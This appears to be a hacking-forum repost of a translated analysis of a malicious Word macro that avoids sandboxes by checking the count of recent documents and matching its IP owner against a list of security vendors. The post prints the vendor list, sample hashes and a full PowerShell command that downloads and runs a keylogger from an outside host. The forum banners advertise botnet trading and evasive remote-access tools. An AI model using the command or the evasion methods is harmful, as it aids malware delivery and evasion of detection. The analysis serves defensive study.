开启邀请码注册中,禁止灌水!发现一次永久禁言

墨客安全网

 找回密码
 立即注册

墨客安全网-新手入门指南 常见问题及帮助 | 做任务赚墨币币 新人报道 | 悬赏问答| 墨币充值| 帖子举报

墨客安全网-论坛精华合集 墨客安全网 -精华合集 之 速成之路 原创精品 | 加入墨客Vip | Vip工具| Vip教程

墨客安全网-进阶技术学习区 软件/工具| 社工专区 | 入侵检测| 技术文章 动画教程 | 编程交流| 免杀更新 | 程序源码

[悬赏公告] - 严查灌水,打造一个无水论坛,从即日起.请大家互相监督,发现恶意灌水的,请发贴举报,核实后会给予5-10的墨币奖励。
[官方公告] 从今日起所有会员发布工具必须到审核板块进行审核,如有违反永久禁言处理!
 [招聘招聘]-招聘各方面给力版主,要求每日发帖不少于3贴,每天在线时间6个小时以上,具体福利和待遇联系TG客服或者在线管理员
[官方公告]1.发现网盘下载地址失效!可以发贴举报 审核证实后给予奖励10-20墨币。2.即日起!不管是谁发贴!都不能带QQ群 已及个人QQ。个人网站,发现后严格处理。[官方业务]-加入墨客安全网Vip,圆你日抓千鸡梦,各种精品教程,免杀远控,压力测试等你拿,期待各位会员的加入,即可享受众多福利!
【官方公告】论坛所有广告均为商业行为,需要交易的请尽量走担保程序,所有因广告产生的任何纠纷请私下解决【站外广告】大量收色刷!刷单肉鸡!带飞机肉鸡!寻内网横向技术!懂的来,小白勿扰!长期包养色刷,刷单,带飞机海外盘国内盘灰产肉鸡稳定鸡商
联系飞机:@seeok91
【官方业务】精品广告位招租,需要请联系官方TG客服【官方业务】精品广告位招租,需要请联系官方TG客服【官方业务】精品广告位招租,需要请联系官方TG客服
查看: 337|回复: 0

[其它知识] 这个恶意软件“奇葩”的反虚拟机技巧

[复制链接]
  • TA的每日心情
    奋斗
    2018-6-7 22:27
  • 签到天数: 82 天

    连续签到: 3 天

    [LV.6]常住居民II

    12

    主题

    737

    回帖

    3715

    积分

    UID
    8033
    威望
    1168 (点)
    主题
    12 (帖)
    精华
    0 (帖)
    贡献
    11  (次)
    墨币
    619  (枚)
    活跃
    460  (点)
    担保币
    0  (枚)
    注册时间
    2016-6-11
    最后登录
    2018-6-7

    论坛帅哥绝世好人音乐大师兄弟义气最佳新人

    QQ
    发表于 2016-9-30 13:31:57 | 显示全部楼层 |阅读模式
    xxx.jpg
    最近,我分析到一个行为异常的恶意软件样本。由于很难发现该恶意软件的真实行为,所以我花了很多时间去调试分析。然而在分析过程中,又有多种因素会导致运行崩溃和异常。在此,我就发表了对该恶意软件反虚拟机的一些技术。

    样本信息

    恶意软件样本文件名为“Intelligent Software Solutions Inc.doc“,其SHA256值为:

    048fc07fb94a74990d2d2b8e92c099f3f986af185c32d74c857b07f7fcce7f8e
    以下是样本文件打开运行时的示例:

    anti-vm-tricks-word-view.png

    如果这看起来不太可疑,请看其代码视图:

    anti-vm-tricks-vb-code.png

    2016-09-27_202426.jpg

    这是一个经典的教科书式的WORD恶意软件,它没有实质内容,但包括了经过混淆的可执行代码,看上去非常简洁。

    分析调查

    从代码层面来看,顶部的分支程序像是程序的执行入口,很有可能是当WORD文档被打开后,点击“enable contenet” 执行Active X控件的操作,最终,程序会排错调用IuIxpP子程序。

    3333333333333.jpg

    技巧:

    在子程序 IuIxpP中,分别调用了两个方法DKTxHE 和 qrNjY,并抛出不同的执行错误。

    2016-09-27_203150.jpg

    其中,DKTxHE 功能为:

    2016-09-27_203455.jpg

    RecentFiles对象表示系统最近打开过的历史文档。通常,安装了word程序的用户可能会打开超过2个或更多数量的文档。然而,当该恶意软件植入到新创建的虚拟机和word环境中后,总是状况不断,不能正常运行。每次测试时手动打开一两次,总是出现程序异常。即使是保存了虚拟机镜像状态,重启调试分析后,恶意程序仍然不能正常执行。

    从DKTxHE函数功能可以看出,恶意软件以RecentFiles数量来判断是否身处VM环境中,如果在VM环境中,它将不会执行任何恶意行为,非常“聪明”。之后,我随意创建了3个不同名称的word文档,逐一打开并关闭,让历史文档数量为3,最终成功运行并检测到了恶意软件。

    原因很明了,虚拟机环境一般缺乏多个Word文档,恶意程序通过探测最近打开的历史文档数量,判断是否处于VM环境中,如果在最近打开文档数量内发现只有3个以下的word文档,就会拒绝执行。

    技巧:

    在另一个子程序 qrNjY中,恶意软件通过探测ip信息来识别VM环境。首先,它通过向远程地址发出某种认证请求,

    https://www.maxmind.com/geoip/v2.1/city/me
    之后设置请求信息中的HTTP Refer属性和User-Agent值,访问链接:

    https://www.maxmind.com/en/locate-my-ip-address
    以此获取宿主系统的地址信息,如:

    2016-09-27_124440.jpg

    获取信息封装于JSON格式文件中,包含国家、城市、或者与IP相关的组织机构等信息。如:

    {
      "location": {
        "latitude": 30.7858,
        "longitude": -102.1232,
        "metro_code": 705,
        "accuracy_radius": 5,
        "time_zone": "America/Los_Angeles"
      },
      "continent": {
        "names": {
          "ja": "北アメリカ",
          "pt-BR": "América do Norte",
          "de": "Nordamerika",
          "es": "Norteamérica",
          "ru": "Северная Америка",
          "fr": "Amérique du Nord",
          "zh-CN": "北美洲",
          "en": "North America"
        },
        "code": "NA",
        "geoname_id": 6255149
      },
      "city": {
        "names": {
          "pt-BR": "Oakland",
          "de": "Oakland",
          "es": "Oakland",
          "ja": "オークランド",
          "en": "Oakland",
          "ru": "Окленд",
          "fr": "Oakland",
          "zh-CN": "奥克兰"
        },
        "geoname_id": 5378538
      },
      "postal": {
        "code": "94619"
      },
      "country": {
        "names": {
          "ru": "США",
          "fr": "états-Unis",
          "zh-CN": "美国",
          "en": "United States",
          "ja": "アメリカ合衆国",
          "es": "Estados Unidos",
          "pt-BR": "Estados Unidos",
          "de": "USA"
        },
        "iso_code": "US",
        "geoname_id": 6252001
      },
      "traits": {
        "organization": "Comcast Cable",
        "isp": "Comcast Cable",
        "ip_address": "123.123.123.123",
        "autonomous_system_organization": "Comcast Cable Communications, LLC",
        "domain": "comcast.net",
        "autonomous_system_number": 7922
      },
      "registered_country": {
        "geoname_id": 6252001,
        "names": {
          "zh-CN": "美国",
          "ru": "США",
          "fr": "états-Unis",
          "en": "United States",
          "ja": "アメリカ合衆国",
          "pt-BR": "Estados Unidos",
          "de": "USA",
          "es": "Estados Unidos"
        },
        "iso_code": "US"
      },
      "subdivisions": [
        {
          "geoname_id": 5332921,
          "names": {
            "ru": "Калифорния",
            "fr": "Californie",
            "zh-CN": "加利福尼亚州",
            "en": "California",
            "ja": "カリフォルニア州",
            "pt-BR": "Califórnia",
            "es": "California",
            "de": "Kalifornien"
          },
          "iso_code": "CA"
        }
      ]
    }
    在以上示例文件中,IP信息的organization字段显示为美国Comcast宽带网络供应商。恶意软件发出访问请求后,获取到宿主系统的相关信息将存储于某个数组中。如果获取到的组织机构名称与以下JSON文件中的任何机构字符串匹配,恶意软件将发生异常并停止运行。

    Amazon
    anonymous
    BitDefender
    BlackOakComputers
    Blue Coat
    BlueCoat
    Cisco
    cloud
    Data Center
    DataCenter
    DataCentre
    dedicated
    ESET, Spol
    FireEye
    ForcePoint
    Fortinet
    Hetzner
    hispeed.ch
    hosted
    Hosting
    Iron Port
    IronPort
    LeaseWeb
    MessageLabs
    Microsoft
    MimeCast
    NForce
    Ovh Sas
    Palo Alto
    ProofPoint
    Rackspace
    security
    Server
    Strong Technologies
    Trend Micro
    TrendMicro
    TrustWave
    VMVault
    Zscaler
    当然,上述列表中的机构名称在代码中是经过混淆的:

    2016-09-27_214039.jpg

    以上信息表明,恶意程序通过检查,是否有网络服务商或杀毒软件公司相关的IP地址运行VM虚拟机对其进行调试分析,如果有,将停止运行。

    PAYLOAD

    如果恶意程序发现宿主系统有3个或以上的Word最近打开文档,将会执行远程下载解盘记录程序的PowerShell脚本:

    powershell.exe -ExecutionPolicy Bypass -windowstyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)
    http://silkflowersdecordesign.com/admin/worddata.dat中涉及的worddata.dat是一个轻量级的键盘记录程序,SHA256为19d884d3b688abf8e284d3bc6a06817096d15592bcd73f85a0e4b79749f2a744。

    2016-09-27_215157.jpg

    其它

    Researchers at Proofpoint 和Deepen Desai at zscaler两篇文章都对 anti-vm和anti-sandbox做了深入讨论,这些技术涉及到了不同种类的恶意软件,它们或许代表了VBA恶意软件的一种发展趋势。

    当然,看雪论坛的一篇经典文章《虚拟机检测技术剖析》,也是非常值得学习的。


    样本代码和文件分析:VirusTotal

    *参考来源:Sentinelone, *FB小编clouds编译,转载请注明来自FreeBuf(FreeBuf.COM)
    新人必看帖,如何快速赚取墨币,了解墨客安全网论坛版规,等等...( 点我查看

    如果你在论坛悬赏问答求助问题,并且已经从坛友或者管理的回复中解决了问题,请在帖子内点击(已解决)

    发帖求助前要善用 论坛搜索 功能,如果搜不到可以试试,论坛顶上的 百度站内搜索 - 纵横站内搜索 那里可能会有你要找的答案;

    如果发现论坛有灌水帖、下载地址失效帖、后门帖、广告帖、工具不能正常使用、都可以去 举报版块 发帖举报,核实给予退回墨币+额外的墨币奖励哦;
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    1、请认真发帖,禁止回复纯表情,纯数字等无意义的内容!帖子内容不要太简单!
    2、提倡文明上网,净化网络环境!抵制低俗不良违法有害信息。
    3、每个贴内连续回复请勿多余3贴,每个版面回复请勿多余10贴!
    4、如果你对主帖作者的帖子不屑一顾的话,请勿回帖。谢谢合作!

    关闭

    站长推荐上一条 /1 下一条